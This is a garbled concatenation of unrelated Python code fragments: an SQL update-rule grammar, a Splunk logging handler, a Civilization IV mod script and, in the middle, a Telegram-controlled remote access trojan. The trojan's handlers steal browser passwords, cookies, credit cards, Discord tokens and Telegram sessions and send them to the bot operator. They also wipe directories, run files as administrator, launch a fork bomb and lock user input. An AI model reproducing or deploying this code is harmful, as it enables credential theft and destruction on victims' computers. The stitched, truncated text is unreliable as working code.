    """Baseclass for update rules
    The check()/sql() methods are a form of self documentation and are
    database implementation dependent. For example the check method
    for the RangeSearchRule rule is implemented to match the BETWEEN condition
    in sqlite3.
    """
    def __init__(self):
        super(UpdateRule, self).__init__()
    def sqlstr(self):
        """ like sql() but returns a single string representing the rule"""
        # substitute each '?' placeholder with its formatted bound value
        s,v = self.sql()
        return s.replace("?","{}").format(*map(self.fmtval,v))
class ColumnUpdateRule(UpdateRule):
    """Base class for applying a rule to a column in a table"""
    def __init__(self, column, value):
        super(ColumnUpdateRule, self).__init__()
        self.column = column  # target column name
        self.value = value    # value to apply to the column
class AssignmentRule(ColumnUpdateRule):
    """Update rule assigning an exact value to a column.

    Works for both text and integer columns.
    """
    def __repr__(self):
        return "<{} = {}>".format(self.column, self.fmtval(self.value))
    def sql(self):
        """Return the SQL fragment and its bound parameter tuple."""
        fragment = "%s = ?" % (self.column,)
        return fragment, (self.value,)
class MetaUpdateRule(UpdateRule):
    """group one or more update rules"""
    def __init__(self, rules):
        super(MetaUpdateRule, self).__init__()
        self.rules = rules  # child UpdateRule instances combined by subclasses
class AndUpdateRule(MetaUpdateRule):
    """MetaUpdateRule joining its child rules into one comma-separated
    SQL fragment (e.g. the SET clause of an UPDATE statement)."""
    def __repr__(self):
        inner = ' '.join(map(repr, self.rules))
        return "<" + inner + ">"
    def sql(self):
        """Return the combined SQL fragment and all bound values."""
        fragments = []
        values = []
        for child in self.rules:
            text, vals = child.sql()
            fragments.append(text)
            values.extend(vals)
        combined = ', '.join(fragments) if fragments else ""
        return combined, tuple(values)
class UpdateGrammar(Grammar):
    def __init__(self):
        # no extra state beyond the base Grammar
        super(UpdateGrammar, self).__init__()
    def compile_operators(self):
        """Configure tokens, operators and meta options for update queries."""
        self.all_text = 'text'
        # sigil is used to define the oldstyle syntax marker
        # it should not appear in tok_special
        self.sigil = '.'
        # tokens control how the grammar is parsed.
        self.tok_whitespace = " \t" # token separators
        # all meaningful non-text chars
        self.tok_operators = '~!=<>()|&'
        self.tok_flow = ""
        self.tok_special = self.tok_operators + self.tok_flow
        self.tok_negate = None
        self.tok_nest_begin = None
        self.tok_nest_end = None
        self.tok_quote = "\""
        self.tok_escape = "\\"
        # does not require left token
        self.operators = {
        }
        self.operators_invert = {}
        # require left/right token
        self.special = {
            "=" :AssignmentRule,
            "==":AssignmentRule,
        }
        self.special_invert = {}
        # meta options can be used to control the query results
        # by default, limit could be used to limit the number of results
        self.meta_columns = set([Grammar.META_DEBUG])
        self.meta_options = dict()
        # old-style queries accept the "special" operators directly
        self.old_style_operators = self.operators.copy()
        self.old_style_operators.update(self.special)
        self.old_style_operators_invert = self.operators_invert.copy()
        self.old_style_operators_invert.update(self.special_invert)
        self.operators_flow = {
        }
        self.operators_flow_invert = { v:k for k,v in self.operators_flow.items() }
        # joining rule used when multiple update rules are combined
        self.operators_flow_join = AndUpdateRule
def buildRule(self, colid, rule ,value):
"""
this must be expanded to support new data formats.
"""
col = self.translateColumn( colid )
if col == self.all_text:
return self.allTextRule(rule, value)
elif col in self.text_fields:
return rule( col, value )
elif col in self.date_fields:
return self.buildDateRule(col, rule, | |
# <reponame>jay-johnson/spylunking
"""
Including a handler derived from the original repository:
https://github.com/zach-taylor/splunk_handler
This version was built to fix issues seen
with multiple Celery worker processes.
Available environment variables:
::
export SPLUNK_HOST="<splunk host>"
export SPLUNK_PORT="<splunk port: 8088>"
export SPLUNK_API_PORT="<splunk port: 8089>"
export SPLUNK_ADDRESS="<splunk address host:port>"
export SPLUNK_API_ADDRESS="<splunk api address host:port>"
export SPLUNK_TOKEN="<splunk token>"
export SPLUNK_INDEX="<splunk index>"
export SPLUNK_SOURCE="<splunk source>"
export SPLUNK_SOURCETYPE="<splunk sourcetype>"
export SPLUNK_VERIFY="<verify certs on HTTP POST>"
export SPLUNK_TIMEOUT="<timeout in seconds>"
export SPLUNK_QUEUE_SIZE="<num msgs allowed in queue - 0=infinite>"
export SPLUNK_SLEEP_INTERVAL="<sleep in seconds per batch>"
export SPLUNK_RETRY_COUNT="<attempts per log to retry publishing>"
export SPLUNK_RETRY_BACKOFF="<cooldown in seconds per failed POST>"
export SPLUNK_DEBUG="<1 enable debug|0 off>"
"""
import sys
import atexit
import traceback
import multiprocessing
import threading
import json
import logging
import socket
import time
import requests
import spylunking.send_to_splunk as send_to_splunk
from threading import Timer
from spylunking.rnow import rnow
from spylunking.ppj import ppj
from spylunking.consts import SPLUNK_HOST
from spylunking.consts import SPLUNK_PORT
from spylunking.consts import SPLUNK_TOKEN
from spylunking.consts import SPLUNK_INDEX
from spylunking.consts import SPLUNK_SOURCE
from spylunking.consts import SPLUNK_SOURCETYPE
from spylunking.consts import SPLUNK_VERIFY
from spylunking.consts import SPLUNK_TIMEOUT
from spylunking.consts import SPLUNK_SLEEP_INTERVAL
from spylunking.consts import SPLUNK_RETRY_COUNT
from spylunking.consts import SPLUNK_RETRY_BACKOFF
from spylunking.consts import SPLUNK_QUEUE_SIZE
from spylunking.consts import SPLUNK_DEBUG
from requests.packages.urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
is_py2 = sys.version[0] == '2'
if is_py2:
from Queue import Queue # noqa
else:
from queue import Queue # noqa
# For keeping track of running class instances
# (each SplunkPublisher appends itself here in __init__; perform_exit and
# force_flush iterate this list at shutdown)
instances = []
# Called when application exit imminent (main thread ended / got kill signal)
@atexit.register
def perform_exit():
    """Shut down every registered publisher instance at interpreter exit.

    This cleans up each worker process which could be in the middle of a
    request/sleep/block action. Tested on python 3 with Celery and single
    processes.
    """
    if SPLUNK_DEBUG:
        print('{} -------------------------------'.format(rnow()))
        print('{} splunkpub: atexit.register - start'.format(rnow()))
    all_ok = True
    for inst in instances:
        try:
            if SPLUNK_DEBUG:
                print('{} - shutting down instance={} - start'.format(
                    rnow(), inst))
            inst.shutdown()
            if SPLUNK_DEBUG:
                print('{} - shutting down instance={} - done'.format(
                    rnow(), inst))
        except Exception as err:
            all_ok = False
            if SPLUNK_DEBUG:
                print(
                    '{} - shutting down instance={} '
                    '- hit ex={} during shutdown'.format(
                        rnow(), inst, err))
    # end of try/ex
    if not all_ok:
        if SPLUNK_DEBUG:
            print('{} Failed exiting'.format(rnow()))
    if SPLUNK_DEBUG:
        print('{} splunkpub: atexit.register - done'.format(rnow()))
        print('{} -------------------------------'.format(rnow()))
# end of perform_exit
def force_flush():
    """Flush the queued messages of every registered publisher instance."""
    if SPLUNK_DEBUG:
        print('{} -------------------------------'.format(rnow()))
        print('{} splunkpub: force_flush - start'.format(rnow()))
    all_ok = True
    for inst in instances:
        try:
            inst.force_flush()
        except Exception as err:
            all_ok = False
            if SPLUNK_DEBUG:
                print(
                    '{} - force_flush instance={} '
                    '- hit ex={}'.format(
                        rnow(), inst, err))
    # end of try/ex
    if not all_ok:
        if SPLUNK_DEBUG:
            print('{} Failed flushing queues'.format(rnow()))
    if SPLUNK_DEBUG:
        print('{} splunkpub: force_flush - done'.format(rnow()))
        print('{} -------------------------------'.format(rnow()))
# end of force_flush
class SplunkPublisher(logging.Handler):
"""
A logging handler to send logs to a Splunk Enterprise instance
running the Splunk HTTP Event Collector.
Originally inspired from the repository:
https://github.com/zach-taylor/splunk_handler
This class allows multiple processes like Celery workers
to reliably publish logs to Splunk from inside of a Celery task
"""
    def __init__(
            self,
            host=None,
            port=None,
            address=None,
            token=None,
            index=None,
            hostname=None,
            source=None,
            sourcetype='text',
            verify=True,
            timeout=60,
            sleep_interval=2.0,
            queue_size=0,
            debug=False,
            retry_count=20,
            retry_backoff=2.0,
            run_once=False):
        """__init__
        Initialize the SplunkPublisher
        :param host: Splunk fqdn
        :param port: Splunk HEC Port 8088
        :param address: Splunk fqdn:8088 - overrides host and port
        :param token: Pre-existing Splunk token
        :param index: Splunk index
        :param hostname: Splunk address <host:port>
        :param source: source for log records
        :param sourcetype: json
        :param verify: verify using certs
        :param timeout: HTTP request timeout in seconds
        :param sleep_interval: Flush the queue of logs interval in seconds
        :param queue_size: Queue this number of logs before dropping
            new logs with 0 is an infinite number of messages
        :param debug: debug the publisher
        :param retry_count: number of publish retries per log record
        :param retry_backoff: cooldown timer in seconds
        :param run_once: test flag for running this just one time
        """
        # register this instance so the module-level atexit hook
        # (perform_exit) and force_flush() can reach it at shutdown
        global instances
        instances.append(self)
        logging.Handler.__init__(self)
        # each argument below falls back to its SPLUNK_* environment-driven
        # default from spylunking.consts when left as None
        self.host = host
        if self.host is None:
            self.host = SPLUNK_HOST
        self.port = port
        if self.port is None:
            self.port = SPLUNK_PORT
        # a combined "host:port" address overrides host/port arguments
        if address:
            address_split = address.split(':')
            self.host = address_split[0]
            self.port = int(address_split[1])
        self.token = token
        if self.token is None:
            self.token = SPLUNK_TOKEN
        self.index = index
        if self.index is None:
            self.index = SPLUNK_INDEX
        self.source = source
        if self.source is None:
            self.source = SPLUNK_SOURCE
        self.sourcetype = sourcetype
        if self.sourcetype is None:
            self.sourcetype = SPLUNK_SOURCETYPE
        self.verify = verify
        if self.verify is None:
            self.verify = SPLUNK_VERIFY
        self.timeout = timeout
        if self.timeout is None:
            self.timeout = SPLUNK_TIMEOUT
        self.sleep_interval = sleep_interval
        if self.sleep_interval is None:
            self.sleep_interval = SPLUNK_SLEEP_INTERVAL
        self.retry_count = retry_count
        if self.retry_count is None:
            self.retry_count = SPLUNK_RETRY_COUNT
        self.retry_backoff = retry_backoff
        if self.retry_backoff is None:
            self.retry_backoff = SPLUNK_RETRY_BACKOFF
        self.queue_size = queue_size
        if self.queue_size is None:
            self.queue_size = SPLUNK_QUEUE_SIZE
        self.log_payload = ''
        self.timer = None
        self.tid = None
        # manager-backed queue and events so multiple processes
        # (e.g. Celery workers) can share state with the publisher
        self.manager = multiprocessing.Manager()
        self.queue = self.manager.Queue(maxsize=self.queue_size)
        self.session = requests.Session()
        self.shutdown_event = multiprocessing.Event()
        self.shutdown_ack = multiprocessing.Event()
        self.already_done = multiprocessing.Event()
        self.testing = False
        self.shutdown_now = False
        self.run_once = run_once
        self.debug_count = 0
        self.debug = debug
        if SPLUNK_DEBUG:
            self.debug = True
            self.debug_log('starting debug mode')
        # default the Splunk event "host" field to this machine's hostname
        if hostname is None:
            self.hostname = socket.gethostname()
        else:
            self.hostname = hostname
        self.debug_log('preparing to override loggers')
        # prevent infinite recursion by silencing requests and urllib3 loggers
        logging.getLogger('requests').propagate = False
        logging.getLogger('urllib3').propagate = False
        # and do the same for ourselves
        logging.getLogger(__name__).propagate = False
        # disable all warnings from urllib3 package
        if not self.verify:
            requests.packages.urllib3.disable_warnings()
        # Set up automatic retry with back-off
        self.debug_log('preparing to create a Requests session')
        # NOTE(review): `method_whitelist` was renamed `allowed_methods` in
        # urllib3 1.26 and removed in 2.0 -- confirm the pinned urllib3
        # version before upgrading dependencies
        retry = Retry(
            total=self.retry_count,
            backoff_factor=self.retry_backoff,
            method_whitelist=False,  # Retry for any HTTP verb
            status_forcelist=[500, 502, 503, 504])
        self.session.mount('https://', HTTPAdapter(max_retries=retry))
        self.start_worker_thread(
            sleep_interval=self.sleep_interval)
        self.debug_log((
            'READY init - sleep_interval={}').format(
                self.sleep_interval))
    # end of __init__
def emit(
self,
record):
"""emit
Emit handler for queue-ing message for
the helper thread to send to Splunk on the ``sleep_interval``
:param record: LogRecord to send to Splunk
https://docs.python.org/3/library/logging.html
"""
self.debug_log('emit')
try:
record = self.format_record(
record)
except Exception as e:
self.write_log(
'Exception in Splunk logging handler={}'.format(e))
self.write_log(
traceback.format_exc())
return
if self.sleep_interval > 0:
try:
self.debug_log('put in queue')
# Put log message into queue; worker thread will pick up
self.queue.put_nowait(
record)
except Exception:
self.write_log(
'log queue full - log data will be dropped.')
else:
# Flush log immediately; is blocking call
self.publish_to_splunk(
payload=record)
# end of emit
def start_worker_thread(
self,
sleep_interval=1.0):
"""start_worker_thread
Start the helper worker thread to publish queued messages
to Splunk
:param sleep_interval: sleep in seconds before reading from
the queue again
"""
# Start a worker thread responsible for sending logs
if self.sleep_interval > 0:
self.debug_log(
'starting worker thread')
self.timer = Timer(
sleep_interval,
self.perform_work)
self.timer.daemon = True # Auto-kill thread if main process exits
self.timer.start()
# end of start_worker_thread
def write_log(
self,
log_message):
"""write_log
Write logs to stdout
:param log_message: message to log
"""
print('{} splunkpub {}'.format(
rnow(),
log_message))
# end of write_log
def debug_log(
self,
log_message):
"""debug_log
Write logs that only show up in debug mode.
To turn on debugging with environment variables
please set this environment variable:
::
export SPLUNK_DEBUG="1"
:param log_message: message to log
"""
if self.debug:
print('{} splunkpub DEBUG {}'.format(
rnow(),
log_message))
# end of debug_log
def format_record(
self,
record):
"""format_record
Convert a log record into a Splunk-ready format
:param record: message to format
"""
self.debug_log('format_record - start')
if self.source is None:
source = record.pathname
else:
source = self.source
current_time = time.time()
params = {
'time': current_time,
'host': self.hostname,
'index': self.index,
'source': source,
'sourcetype': self.sourcetype,
'event': self.format(record),
}
self.debug_log('record dictionary created')
formatted_record = json.dumps(params, sort_keys=True)
self.debug_log('format_record - done')
return formatted_record
# end of format_record
def build_payload_from_queued_messages(
self,
use_queue,
shutdown_event,
triggered_by_shutdown=False):
"""build_payload_from_queued_messages
Empty the queued messages by building a large ``self.log_payload``
:param use_queue: queue holding the messages
:param shutdown_event: shutdown event
:param triggered_by_shutdown: called during shutdown
"""
self.debug_log('build_payload - start')
not_done = True
while not_done:
if not triggered_by_shutdown and self.is_shutting_down(
shutdown_event=shutdown_event):
self.debug_log(
'build_payload shutting down')
return True
self.debug_count += 1
if self.debug_count > 60:
self.debug_count = 0
self.debug_log('build_payload tid={} queue={}'.format(
self.tid,
str(use_queue)))
try:
msg = use_queue.get(
block=True,
timeout=self.sleep_interval)
self.log_payload = self.log_payload + msg
if self.debug:
self.debug_log('{} got={}'.format(
self,
ppj(msg)))
not_done = not self.queue_empty(
use_queue=use_queue)
except Exception as e:
if self.is_shutting_down(
shutdown_event=shutdown_event):
self.debug_log(
'helper was shut down '
'msgs in the queue may not all '
'have been sent')
if ('No such file | |
'\n*Created* » `%02d/%02d/%d'%(Day, Month, Year) + '`' +
'\n*Size* » `' + FileSize(os.getcwd() + '\\' + File) + '`',
parse_mode='Markdown')
os.remove(os.getcwd() + '\\' + File)
except:
try:
Created = os.path.getctime(os.getcwd() + '\\' + File)
Year, Month, Day, Hour, Minute, Second=localtime(Created)[:-3]
Folder = os.getcwd() + '\\' + File
FolderSize = 0
for (Path, Dirs, Files) in os.walk(Folder):
for iFile in Files:
FileName = os.path.join(Path, iFile)
FolderSize += os.path.getsize(FileName)
Files = Folders = 0
for _, DirNames, FileNames in os.walk(os.getcwd() + '\\' + File):
Files += len(FileNames)
Folders += len(DirNames)
shutil.rmtree(os.getcwd() + '\\' + File)
bot.send_message(command.chat.id,
'_Folder_ *' + File + '* _removed!_'
'\n'
'\n*Created* » `%02d/%02d/%d'%(Day, Month, Year) + '`' +
'\n*Size* » `%0.1f MB' % (FolderSize/(1024*1024.0)) + '`' +
'\n*Contained* » `' + '{:,} Files, {:,} Folders'.format(Files, Folders) + '`',
parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found!_', parse_mode='Markdown')
except PermissionError:
bot.reply_to(command, '_Permission denied!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Remove • /RemoveAll*', parse_mode='Markdown')
# Deletes all files from the directory
@bot.message_handler(commands=['RemoveAll', 'removeall'])
def RemoveAll(command):
try:
bot.send_message(command.chat.id, '_Removing files..._', parse_mode='Markdown')
FolderSize = 0
for (Path, Dirs, Files) in os.walk(os.getcwd()):
for File in Files:
FileNames = os.path.join(Path, File)
FolderSize += os.path.getsize(FileNames)
Files = Folders = 0
for _, DirNames, FileNames in os.walk(os.getcwd()):
Files += len(FileNames)
Folders += len(DirNames)
list = os.listdir(os.getcwd())
a = len(list)
for FileNames in os.listdir(os.getcwd()):
FilePath = os.path.join(os.getcwd(), FileNames)
try:
if os.path.isfile(FilePath) or os.path.islink(FilePath):
os.unlink(FilePath)
elif os.path.isdir(FilePath):
shutil.rmtree(FilePath)
except:
pass
list = os.listdir(os.getcwd())
b = len(list)
c = (a - b)
bot.send_message(command.chat.id,
'_Removed_ *' + str(c) + '* _files out of_ *' + str(a) + '!*'
'\n'
'\nSize » `%0.1f MB' % (FolderSize/(1024*1024.0)) + '`' +
'\nContained » `' + '{:,} Files, {:,} Folders'.format(Files, Folders) + '`',
parse_mode='Markdown')
except:
pass
# Upload a file to a connected computer (URL)
@bot.message_handler(regexp='/Upload')
def Upload(command):
try:
URL = re.split('/Upload ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Uploading file..._', parse_mode='Markdown')
r = requests.get(URL, allow_redirects=True)
File = os.getcwd() + '\\' + os.path.basename(r.URL)
open(File, 'wb').write(r.content)
bot.reply_to(command, '_File uploaded to computer!_\n\n`' + File + '`', parse_mode='Markdown')
except ValueError:
bot.reply_to(command, '_Insert a direct download link_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Send file or paste URL_\n\n*› /Upload*', parse_mode='Markdown')
# Download a file to a connected computer (Message)
@bot.message_handler(content_types=['document'])
def Document(command):
try:
File = bot.get_file(command.document.file_id)
bot.send_message(command.chat.id, '_Uploading file..._', parse_mode='Markdown')
DownloadedFile = bot.download_file(File.file_path)
Source = Directory + File.file_path;
with open(Source, 'wb') as NewFile:
NewFile.write(DownloadedFile)
Final = os.getcwd() + '\\' + Source.split(File.file_path)[1] + command.document.file_name
shutil.move(Source, Final)
bot.reply_to(command, '_File uploaded to computer!_\n\n`' + Final + '`', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File format is not supported!_', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_Try saving the file in a different directory_', parse_mode='Markdown')
except:
bot.reply_to(command, '_You cannot upload a file larger than 20 MB_', parse_mode='Markdown')
# Download the file selected by the user
@bot.message_handler(regexp='/Download')
def Download(command):
try:
File = re.split('/Download ', command.text, flags=re.I)[1]
Download = open(os.getcwd() + '\\' + File, 'rb')
bot.send_message(command.chat.id, '_Sending file..._', parse_mode='Markdown')
bot.send_document(command.chat.id, Download)
except FileNotFoundError:
bot.reply_to(command, '_File not found!_', parse_mode='Markdown')
except:
try:
File = re.split('/Download ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Archiving..._', parse_mode='Markdown')
shutil.make_archive(Directory + File,
'zip',
os.getcwd() + '\\',
File)
iFile = open(Directory + File + '.zip', 'rb')
bot.send_message(command.chat.id, '_Sending folder..._', parse_mode='Markdown')
bot.send_document(command.chat.id, iFile)
iFile.close()
os.remove(Directory + File + '.zip')
except PermissionError:
bot.reply_to(command, '_Permission denied!_', parse_mode='Markdown')
except:
try:
iFile.close()
os.remove(Directory + File + '.zip')
bot.reply_to(command, '_You cannot download a file larger than 50 MB_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Download*', parse_mode='Markdown')
# Runs the file selected by the user
@bot.message_handler(commands=['Run', 'run'])
def Run(command):
try:
File = re.split('/Run ', command.text, flags=re.I)[1]
os.startfile(os.getcwd() + '\\' + File)
bot.reply_to(command, '_File_ *' + File + '* _is running!_', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found!_', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_The file is isolated by the system and cannot be running_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Run • /RunAS*', parse_mode='Markdown')
# Runs the file selected by the user as administrator
@bot.message_handler(commands=['RunAS', 'runas'])
def RunAS(command):
try:
File = re.split('/RunAS ', command.text, flags=re.I)[1]
os.startfile(os.getcwd() + '\\' + File, 'runas')
bot.reply_to(command, 'File *' + File + '* is running!', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found!_', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_Acces denied!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Run • /RunAS*', parse_mode='Markdown')
# Gets a list of active processes
@bot.message_handler(regexp='/Tasklist')
def Tasklist(command):
try:
bot.send_message(command.chat.id, '`' + ProcessList() + '`', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Failed to get process list!_', parse_mode='Markdown')
# Kills the user selected process
@bot.message_handler(regexp='/Taskkill')
def Taskkill(command):
try:
Process = re.split('/Taskkill ', command.text, flags=re.I)[1]
KillProcess(Process)
if not Process.endswith('.exe'):
Process = Process + '.exe'
bot.reply_to(command, '_Process_ *' + Process + '* _is was stopped!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Enter process name_'
'\n'
'\n*› /Taskkill*'
'\n'
'\n_Active Window_'
'\n'
'\n`' + str(WindowTitle()) + '`',
reply_markup=main6, parse_mode='Markdown')
# Displays text sent by user
@bot.message_handler(regexp='/Message')
def Message(command):
try:
Message = re.split('/Message ', command.text, flags=re.I)[1]
bot.reply_to(command, '_The message is was sended!_', parse_mode='Markdown')
SendMessageBox(Message)
except:
bot.send_message(command.chat.id, '_Enter your message_\n\n*› /Message*', parse_mode='Markdown')
# Speak text
@bot.message_handler(regexp='/Speak')
def Speak(command):
try:
Text = re.split('/Speak ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Speaking..._', parse_mode='Markdown')
try:
SpeakText(Text)
bot.reply_to(command, '_Successfully!_', parse_mode='Markdown')
except:
bot.reply_to(command, '_Failed to speak text!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your text_\n\n*› /Speak*', parse_mode='Markdown')
# Opens a link from a standard browser
@bot.message_handler(regexp='/OpenURL')
def OpenURL(command):
try:
URL = re.split('/OpenURL ', command.text, flags=re.I)[1]
OpenBrowser(URL)
bot.reply_to(command, '_The URL is was opened!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your URL_\n\n*› /OpenURL*', parse_mode='Markdown')
# Sets the desktop wallpaper
@bot.message_handler(content_types=['photo'])
def Wallpapers(command):
try:
Photo = bot.get_file(command.photo[len(command.photo)-1].file_id)
file_info = bot.get_file(command.photo[len(command.photo)-1].file_id)
downloaded_file = bot.download_file(file_info.file_path)
src = Directory + file_info.file_path;
with open(src, 'wb') as new_file:
new_file.write(downloaded_file)
SetWallpapers(Photo, Directory)
bot.reply_to(command, '_The photo is set on the wallpapers!_', parse_mode='Markdown')
except:
pass
# Infinite start CMD.exe
@bot.message_handler(regexp='/Forkbomb')
def Forkbomb(command):
bot.send_message(command.chat.id, '_Preparing ForkBomb..._', parse_mode='Markdown')
ForkBomb()
# Gets Discord Token
@bot.message_handler(regexp='/Discord')
def Discord(command):
try:
bot.send_message(command.chat.id, '*Discord Token*\n\n`' + DiscordToken() + '`', parse_mode='Markdown')
except:
bot.reply_to(command, '_Discord not installed!_', parse_mode='Markdown')
# Gets the user current telegram session
@bot.message_handler(regexp='/Telegram')
def Telegram(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
TelegramGrab(Directory)
Telegram = open(Directory + 'tdata.zip', 'rb')
bot.send_document(command.chat.id, Telegram)
except:
bot.reply_to(command, '_Telegram not installed!_', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/CreditCards')
def CreditCards(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'CreditCards.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedCreditCards())
CreditCards = open(Directory + 'CreditCards.txt', 'rb')
bot.send_document(command.chat.id, CreditCards)
except:
bot.reply_to(command, '_CreditCards not found!_', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Bookmarks')
def Bookmarks(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Bookmarks.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedBookmarks())
Bookmarks = open(Directory + 'Bookmarks.txt', 'rb')
bot.send_document(command.chat.id, Bookmarks)
except:
bot.reply_to(command, '_Bookmarks not found!_', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Passwords')
def Passwords(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Passwords.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedPasswords())
Passwords = open(Directory + 'Passwords.txt', 'rb')
bot.send_document(command.chat.id, Passwords)
except:
bot.reply_to(command, '_Passwords not found!_', parse_mode='Markdown')
# Retrieves saved cookies from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Cookies')
def Cookies(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Cookies.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedCookies())
Cookies = open(Directory + 'Cookies.txt', 'rb')
bot.send_document(command.chat.id, Cookies)
except:
bot.reply_to(command, '_Cookies not found!_', parse_mode='Markdown')
# Gets saved browser history (Opera, Chrome)
@bot.message_handler(regexp='/History')
def History(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'History.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedHistory())
History = open(Directory + 'History.txt', 'rb')
bot.send_document(command.chat.id, History)
except:
bot.reply_to(command, '_History not found!_', parse_mode='Markdown')
# Editing and viewing the clipboard
@bot.message_handler(regexp='/Clipboard')
def Clipboard(command):
try:
Text = re.split('/Clipboard ', command.text, flags=re.I)[1]
SetClipboard(Text)
bot.reply_to(command, '_Clipboard contents changed!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Enter your text_'
'\n'
'\n*› /Clipboard*'
'\n'
'\n_Clipboard Content_'
'\n'
'\n`' + GetClipboard() + '`',
parse_mode='Markdown')
# Display Rotate <0,90,180,270>
@bot.message_handler(regexp='/Rotate')
def Rotate(command):
try:
Position = re.split('/Rotate ', command.text, flags=re.I)[1]
DisplayRotate(Degrees=Position)
bot.reply_to(command, '_Display is was rotated!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Select display rotation_'
'\n'
'\n*› /Rotate*'
'\n'
'\n_Provisions_'
'\n'
'\n`0` / `90` / `180` / `270`',
parse_mode='Markdown')
# Monitor <on/off>
@bot.message_handler(regexp='/Monitor')
def Monitor(command):
try:
Monitor = re.split('/Monitor ', command.text, flags=re.I)[1]
if Monitor.lower() == 'Off'.lower():
Off()
bot.reply_to(command, '_Monitor is was Off_', parse_mode='Markdown')
if Monitor.lower() == 'On'.lower():
On()
bot.reply_to(command, '_Monitor is was On_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Select monitor mode_'
'\n'
'\n*› /Monitor*'
'\n'
'\n_Modes_'
'\n'
'\n`On` / `Off`',
parse_mode='Markdown')
# Lock input (keyboard and mouse) for the selected number of seconds
@bot.message_handler(regexp='/Freeze')
def Freeze(command):
if Admin() is False:
bot.send_message(command.chat.id, '_This function requires admin rights!_', parse_mode='Markdown')
if Admin() is True:
try:
Seconds = re.split('/Freeze ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Keyboard and mouse locked for_ *' + Seconds + '* _seconds!_', parse_mode='Markdown')
Block(float(Seconds))
bot.reply_to(command, '_Keyboard and mouse are now unlocked!_', parse_mode='Markdown')
except ValueError:
bot.reply_to(command, '_Specify the duration of the lock in seconds_', | |
from Events import handler
from RiseAndFall import *
from RFCUtils import *
from Core import *
from Locations import *
# civs whose capital should be moved to a fixed historical location
# once they control that city (consumed by relocateCapitals below --
# TODO confirm against RFCUtils)
dRelocatedCapitals = CivDict({
	iPhoenicia : tCarthage,
	iMongols : tBeijing,
	iOttomans : tConstantinople
})
# per-civ capital bonus granted by buildCapitalInfrastructure
# NOTE(review): the first tuple element's meaning is not visible here --
# confirm against buildCapitalInfrastructure; lowercase `temple` differs
# from the iBuilding-style constants and should be verified
dCapitalInfrastructure = CivDict({
	iPhoenicia : (3, [], []),
	iByzantium : (5, [iBarracks, iWalls, iLibrary, iMarket, iGranary, iHarbor, iForge], [temple]),
	iPortugal : (5, [iLibrary, iMarket, iHarbor, iLighthouse, iForge, iWalls], [temple]),
	iItaly : (7, [iLibrary, iPharmacy, iMarket, iArtStudio, iAqueduct, iJail, iWalls], [temple]),
	iNetherlands : (9, [iLibrary, iMarket, iWharf, iLighthouse, iBarracks, iPharmacy, iBank, iArena, iTheatre], [temple]),
})
### CITY ACQUIRED ###
@handler("cityAcquired")
def relocateAcquiredCapital(iOwner, iPlayer, city):
	# move the new owner's capital if the captured city is a designated capital site
	relocateCapitals(iPlayer, city)
@handler("cityAcquired")
def buildAcquiredCapitalInfrastructure(iOwner, iPlayer, city):
buildCapitalInfrastructure(iPlayer, city)
### FIRST CITY ###
@handler("firstCity")
def createAdditionalPolishSettler(city):
	"""Give the Polish AI an extra settler plus crossbow escort near the
	Baltic coast when it founds its capital."""
	owner = city.getOwner()
	if not city.isCapital():
		return
	if civ(owner) != iPoland or player(owner).isHuman():
		return
	weights = {
		tMemel: 1,
		tKoenigsberg: 1,
		tGdansk: 3,
	}
	destination = weighted_random_entry(weights)
	makeUnit(owner, iSettler, destination)
	makeUnit(owner, iCrossbowman, destination)
### CITY BUILT ###
@handler("cityBuilt")
def relocateFoundedCapital(city):
	# same capital relocation check when a city is founded rather than captured
	relocateCapitals(city.getOwner(), city)
@handler("cityBuilt")
def buildFoundedCapitalInfrastructure(city):
buildCapitalInfrastructure(city.getOwner(), city)
@handler("cityBuilt")
def createCarthaginianDefenses(city):
if at(city, tCarthage) and civ(city) == iPhoenicia and not player(city).isHuman():
makeUnit(iPhoenicia, iWorkboat, tCarthage, UnitAITypes.UNITAI_WORKER_SEA)
